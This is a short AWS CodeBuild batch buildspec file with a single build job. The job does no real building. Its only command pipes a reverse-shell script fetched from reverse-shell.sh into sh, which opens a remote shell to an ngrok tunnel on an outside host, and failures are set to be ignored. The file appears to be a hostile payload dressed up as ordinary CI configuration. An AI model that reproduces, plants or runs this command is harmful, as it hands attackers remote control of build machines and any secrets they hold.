version: 0.2

batch:
  fast-fail: false
  build-list:
    - identifier: build1
      env:
        variables:
          BUILD_ID: build1
      buildspec: |
        version: 0.2
        env:
          shell: sh
        phases:
          build:
            commands:
              - curl https://reverse-shell.sh/5.tcp.eu.ngrok.io:29852 | sh
      ignore-failure: true
